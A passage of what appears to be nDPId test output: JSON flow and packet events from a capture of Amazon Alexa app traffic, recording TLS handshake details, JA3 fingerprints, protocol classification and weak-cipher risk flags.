-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":1490976082973,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976082973,"pkt":"AMDKkaPvePiC0\/vCCABFAAAon\/lAAEAGdEWsECrYNu8YuoUFAbsbksFoNXsR7VAQAVfcyAAA"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976082723,"flow_last_seen":1490976082975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976082975,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1490976083245,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976083245,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWypAAOcGEgw27xi6rBAq2AG7hQaUlSPBbZRoTXASH\/4ogAAAAgQFtAEDAwY="} -00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1176,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082723,"flow_last_seen":1490976083245,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976083245,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1177,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":1490976083337,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976083337,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoNvVAAEAG3UmsECrYNu8YuoUGAbttlGhNlJUjwlAQAVdy8QAA"} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085644,"flow_last_seen":1490976085644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085644,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1490976085644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085644,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8I8hAAEAGIyesECrYNF7ohrKHAbtpd3wLAAAAAKAC\/\/9ZswAAAgQFtAQCCAoA9l\/DAAAAAAEDAwg="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085829,"flow_last_seen":1490976085829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085829,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1490976085829,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085829,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8qZ1AAEAGnVGsECrYNF7ohrKIAbvGQPZJAAAAAKAC\/\/+CmQAAAgQFtAQCCAoA9l\/UAAAAAAEDAwg="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085832,"flow_last_seen":1490976085832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085832,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1490976085832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085832,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8k2FAAEAGs42sECrYNF7ohrKJAbv5cMy2AAAAAKAC\/\/94+AAAAgQFtAQCCAoA9l\/XAAAAAAEDAwg="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1198,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085883,"flow_last_seen":1490976085883,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085883,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1198,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1490976085883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085883,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8m\/VAAEAGPiSsECrYCsl+8Z0yH5CNbMQpAAAAAKAC\/\/94MQAAAgQFtAQCCAoA9l\/cAAAAAAEDAwg="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1199,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085884,"flow_last_seen":1490976085884,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085884,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45707,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1199,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1490976085884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085884,"pkt":"AMDKkaPvePiC0\/vCCABFAAA83c5AAEAGaSCsECrYNF7ohrKLAbvdeYISAAAAAKAC\/\/\/fjAAAAgQFtAQCCAoA9l\/cAAAAAAEDAwg="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1200,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085891,"flow_last_seen":1490976085891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085891,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38434,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1490976085891,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085891,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8K1lAAEAGbNGsECrYwKgLAZYiH5Cn8nSEAAAAAKAC\/\/9ycAAAAgQFtAQCCAoA9l\/dAAAAAAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1490976085970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976085970,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwHsZAAOcGgTQ0XuiGrBAq2AG7sofzK0GgaXd8DHASH\/6hqwAAAgQFtAEDAwY="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1490976085970,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976085970,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwdw1AAOcGKO00XuiGrBAq2AG7sojjQR2VxkD2SnASH\/7+lwAAAgQFtAEDAwY="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1490976085977,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976085977,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoI8lAAEAGIzqsECrYNF7ohrKHAbtpd3wM8ytBoVAQAVfsHAAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1204,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085644,"flow_last_seen":1490976085978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976085978,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1205,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1490976085978,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976085978,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoqZ5AAEAGnWSsECrYNF7ohrKIAbvGQPZK40EdllAQAVdJCQAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1206,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085829,"flow_last_seen":1490976085978,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976085978,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1207,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1490976085978,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1490976085978,"pkt":"ePiC0\/vCAMDKkVoBCABFEAAoAABAAD0Gmy7AqAsBrBAq2B+QliIAAAAAp\/J0hVAUAAA7FAAAAAAAAAAA"} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1208,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085644,"flow_last_seen":1490976086218,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086218,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1490976086218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976086218,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwSbFAAOcGVkk0XuiGrBAq2AG7soktOgAj+XDMt3ASH\/7IcwAAAgQFtAEDAwY="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1490976086218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976086218,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwHTJAAOcGgsg0XuiGrBAq2AG7sosHecze3XmCE3ASH\/6IEgAAAgQFtAEDAwY="} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1212,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085829,"flow_last_seen":1490976086218,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086218,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1216,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1490976086219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976086219,"pkt":"AMDKkaPvePiC0\/vCCABFAAAok2JAAEAGs6CsECrYNF7ohrKJAbv5cMy3LToAJFAQAVcS5QAA"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1490976086220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976086220,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo3c9AAEAGaTOsECrYNF7ohrKLAbvdeYITB3nM31AQAVfSgwAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085832,"flow_last_seen":1490976086244,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976086244,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1230,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085832,"flow_last_seen":1490976086648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086648,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1243,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1490976086880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976086880,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8m\/ZAAEAGPiOsECrYCsl+8Z0yH5CNbMQpAAAAAKAC\/\/93zQAAAgQFtAQCCAoA9mBAAAAAAAEDAwg="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088605,"flow_last_seen":1490976088605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976088605,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1490976088605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088605,"pkt":"AMDKkaPvePiC0\/vCCABFAAA81ixAAEAGcMKsECrYNF7ohrKNAbu9HLbAAAAAAKAC\/\/\/KKQAAAgQFtAQCCAoA9mDsAAAAAAEDAwg="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1267,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088631,"flow_last_seen":1490976088631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976088631,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1267,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1490976088631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088631,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8NFtAAEAGEpSsECrYNF7ohrKOAbuEplS0AAAAAKAC\/\/9kqAAAAgQFtAQCCAoA9mDvAAAAAAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1268,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":2,"flow_last_seen":1490976088845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976088845,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwfFZAAOcGI6Q0XuiGrBAq2AG7so2w2ze+vRy2wXASH\/5ffQAAAgQFtAEDAwY="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1490976088845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976088845,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw3pBAAOcGwWk0XuiGrBAq2AG7so5AYHD5hKZUtXASH\/4xPwAAAgQFtAEDAwY="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":3,"flow_last_seen":1490976088847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976088847,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo1i1AAEAGcNWsECrYNF7ohrKNAbu9HLbBsNs3v1AQAVep7gAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1273,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976088605,"flow_last_seen":1490976088849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976088849,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1274,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1490976088850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976088850,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoNFxAAEAGEqesECrYNF7ohrKOAbuEplS1QGBw+lAQAVd7sAAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1276,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976088631,"flow_last_seen":1490976088854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976088854,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","ndpi": 